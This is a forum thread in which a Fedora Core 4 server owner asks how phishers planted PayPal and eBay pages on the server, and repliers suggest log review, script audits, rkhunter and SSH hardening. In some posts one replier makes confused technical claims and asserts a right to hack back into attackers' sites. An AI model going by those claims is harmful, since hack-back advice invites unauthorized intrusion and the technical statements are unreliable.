pajiao
asked on
Phishing problem
Hi guys,
My server has constantly being used as phishing for ebay and paypal. I am using FEdora core 4. How did they do it and what can i do to prevent it?
Thanks
My server has constantly being used as phishing for ebay and paypal. I am using FEdora core 4. How did they do it and what can i do to prevent it?
Thanks
Check out this awesome software and article
TraceAssure Toolbar
http://www.windowsitpro.com/mobile/pda/Article.cfm?ArticleID=50019&News=1
Reps
TraceAssure Toolbar
http://www.windowsitpro.com/mobile/pda/Article.cfm?ArticleID=50019&News=1
Reps
> .. has constantly being used as phishing for ebay ..
could please explain how they did that, and how you identified that it is your server
could please explain how they did that, and how you identified that it is your server
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
I have been informed that my server has been used for phishing and saw the .cgi-bin folders commonly used. I do not know how did it take place, likely through some web forms as i suspected as i did receive some emails spawn by my web forms without any user inputs.
What logs do i start with? What are the stuff that i should be looking for?
What logs do i start with? What are the stuff that i should be looking for?
> What logs do i start with?
your application logs, if any
You need to disable *all* and *every* application dealing with input data from the browser (other than the path in the URL itself) until you identified the malicious application.
your application logs, if any
You need to disable *all* and *every* application dealing with input data from the browser (other than the path in the URL itself) until you identified the malicious application.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
When PayPal is informed by responsible users and admins that some box on some network is sending phishing scams, PayPal investigates. If the ISP does nothing, PayPal blocks the ISP until they do something about it. The next step is for the giant PayPal to file suit to stop the ISP because the ISP has showed negligence and is participatory in the phishing scam. This brings in the U.S. Treasury Department and the Secret Service. If the ISP doesn't attend to it at this point, the next step is federal court and the subpoena of the ISP's records.
This mostly happens because most outfits now think that software is enough, that is, until they're called into court and finally recognise that software solutions are not enough and they need to hire some human beings to actually track down the culprits and bring them to justice.
You can get infected by merely clicking on a website. The problem was large at Google about a year ago because Google was not checking the validity of their search engine's results. Links would often say one thing and point to some phishing mastermind's box. Thus, both Yahoo and Google wound up in court with a request for all of thier records and the feds got them, even if only in limited amounts.
Your best defense is to find out why PayPal named you as the source for phishing scams. And that's intensive. Looking for files in temp folders, with any execute permissions, .pl .php or otherwise, looking for a.bat, or vudo.c files, checking to see what IRC SpyKidz are all about, and the seemingly innocent links of search engines. When you find the guilty files, you must then document it and keep it as evidence.
It would also help if you tracked down these events by using the extensive log files of Linux, Apache, and especially coordinating times and occurences by using the log options of Bind. Every access and query to your machine can be logged by Bind and it will reveal patterns of who is hammering away at your machine.
A few months ago php and forum software were compromised and quite a few sites were forced to shut down because no one was monitoring them using that old reliable, the human being.
Those who were using human beings to monitor caught the guys and were not infected or shut down.
Sometimes software is not the answer, and sometimes you just have to do it by hand.
This mostly happens because most outfits now think that software is enough, that is, until they're called into court and finally recognise that software solutions are not enough and they need to hire some human beings to actually track down the culprits and bring them to justice.
You can get infected by merely clicking on a website. The problem was large at Google about a year ago because Google was not checking the validity of their search engine's results. Links would often say one thing and point to some phishing mastermind's box. Thus, both Yahoo and Google wound up in court with a request for all of thier records and the feds got them, even if only in limited amounts.
Your best defense is to find out why PayPal named you as the source for phishing scams. And that's intensive. Looking for files in temp folders, with any execute permissions, .pl .php or otherwise, looking for a.bat, or vudo.c files, checking to see what IRC SpyKidz are all about, and the seemingly innocent links of search engines. When you find the guilty files, you must then document it and keep it as evidence.
It would also help if you tracked down these events by using the extensive log files of Linux, Apache, and especially coordinating times and occurences by using the log options of Bind. Every access and query to your machine can be logged by Bind and it will reveal patterns of who is hammering away at your machine.
A few months ago php and forum software were compromised and quite a few sites were forced to shut down because no one was monitoring them using that old reliable, the human being.
Those who were using human beings to monitor caught the guys and were not infected or shut down.
Sometimes software is not the answer, and sometimes you just have to do it by hand.
ASKER
Sigh,,, i updated all the packages and still i got the phishing. I checked apache logs, nothing suspicious, i checked secure logs, found loads of ssh root attempts failed....How can i prevent all these attempted root logins?
What other logs can i check and what to look out for?
How does all these phishing guys hack into Linux? Thru what kinda vulnerabilities?
What other logs can i check and what to look out for?
How does all these phishing guys hack into Linux? Thru what kinda vulnerabilities?
Could be a rootkit now... did you format, and then reinstall the OS? You may consider paying a hosting service or finding one for free on the net until you can get your server and or source code inspected. *nix can be hacked/root'd just like win32.
-rich
-rich
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
> How can i prevent all these attempted root logins?
you cannot (except disabling ssh)
> Thru what kinda vulnerabilities?
as I already said: most likely using a vulnerability in one of your web applications
Did you check all your applications?
you cannot (except disabling ssh)
> Thru what kinda vulnerabilities?
as I already said: most likely using a vulnerability in one of your web applications
Did you check all your applications?
ASKER
>as I already said: most likely using a vulnerability in one of your web applications
Did you check all your applications?
I didnt know what to check for in my applications seriously. Anyway i am using Apache 2
Did you check all your applications?
I didnt know what to check for in my applications seriously. Anyway i am using Apache 2
Apache is the web server, applications are your script run by apache. perl, php whatever ...
You need to check all those scripts which accept and process input from the client.
You need to check all those scripts which accept and process input from the client.
ASKER
Yes i know the scripts and know where are the places where input from clients are located but what is there to check for those? How can they be of risk and how are these web forms exploited by phishers?
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Apache 2 should block those login attempts, in fact, I believe this was solved in Apache 1.3.31 or something like that, definitely after any Apache 2. There was a long string of attempts before Apache was upgraded past the old stable Apache 1.3 version.
The hacker gang then switched to attacking php. Which they did quite effectively this year, shutting down numerous boards running phpBB2. And yes, it is through the forms that they break in. There's a patch for that though, I believe. I think it was something like guitarworld or one of them that got shutdown, along with quite a few others, a few months back. The snupigood guy was also involved in, or at least his site was fully infected with, redirected google and yahoo links to porn sites and pedophile sites; you may recall herr deputy director homeland security getting caught? That was the ring. And myspace was in the center of it. Surely you've heard about that exploit?
The phishing scam is sophisticated enough to zombie your box; that's where it starts probing other sites using your server as the authority, this starts with some probes, but winds up sending emails and other stuff that the zombie controller logs into your zombied box with. He can also cover his tracks, but he cannot cover the Bind and DNS logs tracks and certain secure logs, etc..
Go get rkhunter and run it. http://www.rootkit.nl/projects/rootkit_hunter.html
I believe that's the correct link.
I believe what I did to stop such attempts was to change the permissions to no execute in the temp folders, all of them. Like I said, KDE was vulnerable and as far as I know still is. Which means, one vist to the wrong page and you're hit. At snupigood, we allowed the dumb site to try it's infection and watched and gatehered all the files it installed. One site even installed the source code and tried to compile it! It was that sophisticated. It then had a section to recompile the kernel itself. Which would have meant that our box would have belonged to the Night of the Walking Dead as it ate us alive. Fortunately, we were ahead of the game and kept all the files for evidence.
Interesting bunch of files; hackers are stupid enough and publicity oriented enough to start signing their software. They were proud of this high level programming, until I guess Interpol and the FBI caught them. The Secret Service has to be involved here too because phishing comes under their jurisdiction.
You just have to tediously check everything and start a watch, an around the clock monitor of who is attacking your system. Try to figure out who they are, where they are at, and do what every good agent does, investigate the hell out of them.
Your box should not allow remote root login, there's a setting for that. Then, it should be set to log and stop any attempted logins over three occurring within some time frame, say 5 within 5 seconds or 5 within a minute. If you look at your logs and it shows an attempt every second, or more than one per second, figure it out, no one can type or click and point that fast, it's a script.
Good Luck again!
The hacker gang then switched to attacking php. Which they did quite effectively this year, shutting down numerous boards running phpBB2. And yes, it is through the forms that they break in. There's a patch for that though, I believe. I think it was something like guitarworld or one of them that got shutdown, along with quite a few others, a few months back. The snupigood guy was also involved in, or at least his site was fully infected with, redirected google and yahoo links to porn sites and pedophile sites; you may recall herr deputy director homeland security getting caught? That was the ring. And myspace was in the center of it. Surely you've heard about that exploit?
The phishing scam is sophisticated enough to zombie your box; that's where it starts probing other sites using your server as the authority, this starts with some probes, but winds up sending emails and other stuff that the zombie controller logs into your zombied box with. He can also cover his tracks, but he cannot cover the Bind and DNS logs tracks and certain secure logs, etc..
Go get rkhunter and run it. http://www.rootkit.nl/projects/rootkit_hunter.html
I believe that's the correct link.
I believe what I did to stop such attempts was to change the permissions to no execute in the temp folders, all of them. Like I said, KDE was vulnerable and as far as I know still is. Which means, one vist to the wrong page and you're hit. At snupigood, we allowed the dumb site to try it's infection and watched and gatehered all the files it installed. One site even installed the source code and tried to compile it! It was that sophisticated. It then had a section to recompile the kernel itself. Which would have meant that our box would have belonged to the Night of the Walking Dead as it ate us alive. Fortunately, we were ahead of the game and kept all the files for evidence.
Interesting bunch of files; hackers are stupid enough and publicity oriented enough to start signing their software. They were proud of this high level programming, until I guess Interpol and the FBI caught them. The Secret Service has to be involved here too because phishing comes under their jurisdiction.
You just have to tediously check everything and start a watch, an around the clock monitor of who is attacking your system. Try to figure out who they are, where they are at, and do what every good agent does, investigate the hell out of them.
Your box should not allow remote root login, there's a setting for that. Then, it should be set to log and stop any attempted logins over three occurring within some time frame, say 5 within 5 seconds or 5 within a minute. If you look at your logs and it shows an attempt every second, or more than one per second, figure it out, no one can type or click and point that fast, it's a script.
Good Luck again!
ASKER
The attempted root login is definitely a script.
How i know phishing was done is when they had a .update, .ebay or .confirm folders in my home www directory and within them has all those php files tat fish user details. I have oredi disabled all my php scripts that does form submission but they are still around.
GinEric wat u did sound deep and i confess i didnt know how to do that!
How i know phishing was done is when they had a .update, .ebay or .confirm folders in my home www directory and within them has all those php files tat fish user details. I have oredi disabled all my php scripts that does form submission but they are still around.
GinEric wat u did sound deep and i confess i didnt know how to do that!
Did somebody click on one of those phishing scam emails? That is how they zombie your site, but storing their scripts in folders that shouldn't even be on your server.
The law is this: if someone accesses my site, they have given me full permission to access any information they put on my site, particularly if they start altering the operation of my site. And if that information leads back to their site and a surreptitious activity there of programming and scripts that automatically invade my sight for the purposes of infringing my copyrights, then I have the absolute legal authority to gather evidence, even if I have to then access their site and inspect, or copy, files, which they are using to harvest my copyrighted materials and orginal creations.
So, if someone breaks in and this results in a detriment to my site, I have the right to go right back and get the proof from their site that they did this.
In any case, I'm not going to roll over and pee for any hacker, I'm going to strike back with legal force and prosecute. bad dog that I am, or, rather, cougar or black panther that I am.
An act of agression is a strike which demands a counterstrike.
These phishers are real criminals. I personally feel that too many software security outfits have chosen to ignore them for too long using software patches to do so. The guys in the New York Times, last week, who got only four years did not get enough time for the crime of identity theft, which is grand larceny, stealing from hard working people; New York should have given one unrepentent guy whose excuse is "I can't help it," 20 years, not 4. He's been in jail before for this, they know him, and yet New York City will probably let him out to do the same thing again in about a year. It's ridiculous. As ridiculous as giving an armed robber of a bank one year; it's not going to defer any criminal from going right back out and doing it again. They figure, one year is worth a million dollars. 20 won't be.
The old Linux server is sitting behind me. When I fire it back up for copying of files on it, I'll recopy the entire set of evidence that shows just how one of them breaks into and installs even source code and then compiles it on an unsuspecting server. I won't release any of this code because it is too sensitive. But I will name the files and explain how anyone can get remoted and zombied by the mere click on a malicious web site.
In the end, you have to have a human being monitoring the network and computer systems; there is no other way.
The law is this: if someone accesses my site, they have given me full permission to access any information they put on my site, particularly if they start altering the operation of my site. And if that information leads back to their site and a surreptitious activity there of programming and scripts that automatically invade my sight for the purposes of infringing my copyrights, then I have the absolute legal authority to gather evidence, even if I have to then access their site and inspect, or copy, files, which they are using to harvest my copyrighted materials and orginal creations.
So, if someone breaks in and this results in a detriment to my site, I have the right to go right back and get the proof from their site that they did this.
In any case, I'm not going to roll over and pee for any hacker, I'm going to strike back with legal force and prosecute. bad dog that I am, or, rather, cougar or black panther that I am.
An act of agression is a strike which demands a counterstrike.
These phishers are real criminals. I personally feel that too many software security outfits have chosen to ignore them for too long using software patches to do so. The guys in the New York Times, last week, who got only four years did not get enough time for the crime of identity theft, which is grand larceny, stealing from hard working people; New York should have given one unrepentent guy whose excuse is "I can't help it," 20 years, not 4. He's been in jail before for this, they know him, and yet New York City will probably let him out to do the same thing again in about a year. It's ridiculous. As ridiculous as giving an armed robber of a bank one year; it's not going to defer any criminal from going right back out and doing it again. They figure, one year is worth a million dollars. 20 won't be.
The old Linux server is sitting behind me. When I fire it back up for copying of files on it, I'll recopy the entire set of evidence that shows just how one of them breaks into and installs even source code and then compiles it on an unsuspecting server. I won't release any of this code because it is too sensitive. But I will name the files and explain how anyone can get remoted and zombied by the mere click on a malicious web site.
In the end, you have to have a human being monitoring the network and computer systems; there is no other way.
P.S.: You can send an email to spoof@eBay.com or spoof@PayPal.com and I believe they will respond. Perhaps even go to PayPal and find the security guys there and tell them your story. This may help you to get off all phishing lists and straigten things out for you.
> The law is this:
somewhere, and in other places it's another law.
> So, if someone breaks in and this results in a detriment to my site, I have the right to go right back and get the proof from their site that they did this.
NO
> These phishers are real criminals.
agreed, but those web site owners running their website with tons of vulnerable scripts which allow frauds to users are criminals too. That's al least legal law in some european countries, and that's not that bad 'cause this way you get someone to be responsible for your damage (as user ;-)
GinEric, no offence meant, but you have to look on other countries practice, sometimes, somehow :-)
somewhere, and in other places it's another law.
> So, if someone breaks in and this results in a detriment to my site, I have the right to go right back and get the proof from their site that they did this.
NO
> These phishers are real criminals.
agreed, but those web site owners running their website with tons of vulnerable scripts which allow frauds to users are criminals too. That's al least legal law in some european countries, and that's not that bad 'cause this way you get someone to be responsible for your damage (as user ;-)
GinEric, no offence meant, but you have to look on other countries practice, sometimes, somehow :-)
Sounds like New York City, and just the kind of thinking that protects muggers on the subway, to me.
However, Copyright Law is a Federal Law, National Security applies since phishing is under the jurisdiction of the Secret Service, and Copyright Law is under the Jurisdiction of the Federal Bureau of Investigation, the combination clearly supports protection of property, a Constitutional Right, and self defence, a human right.
No offense taken, but I'm not under any other country's laws than the United States of America, therefore, I don't care much about other world laws, since they've been pretty much self-serving for the elite few for what, 7,000 years now(?)
The irony is this: most of the phishing and other hacking gangs are led by at least one international spy retiree, nearly all from these "other countries," and a lot of these countries protect them, even encourage them, as long as they report back on their progress at breaking into American computers. Why? Money. It's always money that drives the protection of criminal activity. And it doesn't matter whose defense department it's at, even our own, breaking and entering is still burglary, and Internet cat burglars should not be protected by such foreign laws and agreements.
Let the foreign dignitaries argue with our representatives; no American is going to support subjugation to foreign law on American soil, and rightfully so.
The so-called free world should stop and consider that until we arrived, human beings had no inalienable rights. Yes, the idea originated at Edinburgh, but we put it into law. I know of nothing more distasteful to foreign governments than American law and especially our Bill of Rights, and that cantankerous definition that makes We The People the government. This might give their people the idea that they are somehow free too, and that alone would topple any self-serving government and the criminals that run them.
I've looked on all other country's practices, for all of their histories, and at best I'm disappointed with everyone of them. The worst I've been accused of is telling the truth and that pretty much day in and day out because they tend to mislead my friends at home about their rights here in favor of those ideas that have spewed from the old world's self serving tyrants for all of those 7,000 years.
They can speak and I can disagree, the first right nearly all other country's government detest, the right of every American to say whatever they want, which may, in some cases, expose the old thinkology that makes their imposition of censorship succeed. In the end you have to decide for yourself: freedom of thought or mind police.
And when it comes to a foreign national breaking into any American computer, every American has the God given right to fight back without reservation against what amounts to an attack on the U.S. Here, at least, we hold that an attack against one of us is an attack against all of us.
I think with the Pentagon, Treasury, and Justice behind me, and every American, the only sure National Security is one that regonises each individual has the duty [not just the responsibility] to defend this soil and this people, even if it means the best defense is a good offense. Simply because even the common thief will flee when his or her victim turns and fights.
The idea is too fundamental to be subjugated to law, which is what makes it inalienable, and phishers from overseas invading American's computers and gathering data, espeicially personal and banking data about any American is a threat to our National Security, therfore, it comes under the National Security laws which are designed to protect only one thing, Americans against foreign invasion. And since these attacks can be devastating to individuals, and we hold individuals to be of more value than collectives and committees, such an attack on the one is still an attack on all of us.
I don't want to engage the scapegoated websites who were unwittingly used, the battle goes directly to the attacker, I want the hacker and phisher who started the debacle. I pretty much know that innocent websites can and are used by hackers and phishers as their scapegoat, even if their governments try to protect them; let their officials argue it with our officials, but our officials must stand behind us, not them, in all cases.
Perhaps the worst case scenario is that these foreign governments are aiding and abetting the collection of data on Americans, building databases so that they can use them as a weapon against America. It's not so far fetched as it seems. Treasury certaily recognises it, and the Pentagon recognised it long ago when they commissioned the invention of the Internet for the sole purpose of American National Security because they knew the best defenders were the people themselves, each and every American, that does have the right to defend against such invasions.
The strategy of economic attack has always been the purview of illegitimate governments and institutions. And economic attack at the personal level is where it all starts. Which makes the counterattack a necessity, the duty, of every American.
Notwithstanding the whinings of foreign governments, our stance, in general, is "live with it!"
However, Copyright Law is a Federal Law, National Security applies since phishing is under the jurisdiction of the Secret Service, and Copyright Law is under the Jurisdiction of the Federal Bureau of Investigation, the combination clearly supports protection of property, a Constitutional Right, and self defence, a human right.
No offense taken, but I'm not under any other country's laws than the United States of America, therefore, I don't care much about other world laws, since they've been pretty much self-serving for the elite few for what, 7,000 years now(?)
The irony is this: most of the phishing and other hacking gangs are led by at least one international spy retiree, nearly all from these "other countries," and a lot of these countries protect them, even encourage them, as long as they report back on their progress at breaking into American computers. Why? Money. It's always money that drives the protection of criminal activity. And it doesn't matter whose defense department it's at, even our own, breaking and entering is still burglary, and Internet cat burglars should not be protected by such foreign laws and agreements.
Let the foreign dignitaries argue with our representatives; no American is going to support subjugation to foreign law on American soil, and rightfully so.
The so-called free world should stop and consider that until we arrived, human beings had no inalienable rights. Yes, the idea originated at Edinburgh, but we put it into law. I know of nothing more distasteful to foreign governments than American law and especially our Bill of Rights, and that cantankerous definition that makes We The People the government. This might give their people the idea that they are somehow free too, and that alone would topple any self-serving government and the criminals that run them.
I've looked on all other country's practices, for all of their histories, and at best I'm disappointed with everyone of them. The worst I've been accused of is telling the truth and that pretty much day in and day out because they tend to mislead my friends at home about their rights here in favor of those ideas that have spewed from the old world's self serving tyrants for all of those 7,000 years.
They can speak and I can disagree, the first right nearly all other country's government detest, the right of every American to say whatever they want, which may, in some cases, expose the old thinkology that makes their imposition of censorship succeed. In the end you have to decide for yourself: freedom of thought or mind police.
And when it comes to a foreign national breaking into any American computer, every American has the God given right to fight back without reservation against what amounts to an attack on the U.S. Here, at least, we hold that an attack against one of us is an attack against all of us.
I think with the Pentagon, Treasury, and Justice behind me, and every American, the only sure National Security is one that regonises each individual has the duty [not just the responsibility] to defend this soil and this people, even if it means the best defense is a good offense. Simply because even the common thief will flee when his or her victim turns and fights.
The idea is too fundamental to be subjugated to law, which is what makes it inalienable, and phishers from overseas invading American's computers and gathering data, espeicially personal and banking data about any American is a threat to our National Security, therfore, it comes under the National Security laws which are designed to protect only one thing, Americans against foreign invasion. And since these attacks can be devastating to individuals, and we hold individuals to be of more value than collectives and committees, such an attack on the one is still an attack on all of us.
I don't want to engage the scapegoated websites who were unwittingly used, the battle goes directly to the attacker, I want the hacker and phisher who started the debacle. I pretty much know that innocent websites can and are used by hackers and phishers as their scapegoat, even if their governments try to protect them; let their officials argue it with our officials, but our officials must stand behind us, not them, in all cases.
Perhaps the worst case scenario is that these foreign governments are aiding and abetting the collection of data on Americans, building databases so that they can use them as a weapon against America. It's not so far fetched as it seems. Treasury certaily recognises it, and the Pentagon recognised it long ago when they commissioned the invention of the Internet for the sole purpose of American National Security because they knew the best defenders were the people themselves, each and every American, that does have the right to defend against such invasions.
The strategy of economic attack has always been the purview of illegitimate governments and institutions. And economic attack at the personal level is where it all starts. Which makes the counterattack a necessity, the duty, of every American.
Notwithstanding the whinings of foreign governments, our stance, in general, is "live with it!"
> .. I'm not under any other country's laws than the United States of America, ..
well, that's just one out of roughly 190 others, and still a minority (except in business;-)
so there may roughly 189 which ignore this one ...
well, that's just one out of roughly 190 others, and still a minority (except in business;-)
so there may roughly 189 which ignore this one ...
The best way to secure your server would be to hire experts to do it. PlatinumServerManagement can manage your server for $29 a month. You can hire them for one month just for the server hardening part
http://www.platinumservermanagement.com/
You can also use the free Nessus Vulnerability Scanner to do a scan of your system and find security holes.
http://www.tenablesecurity.com/products/nessus.shtml
I hope this helps you.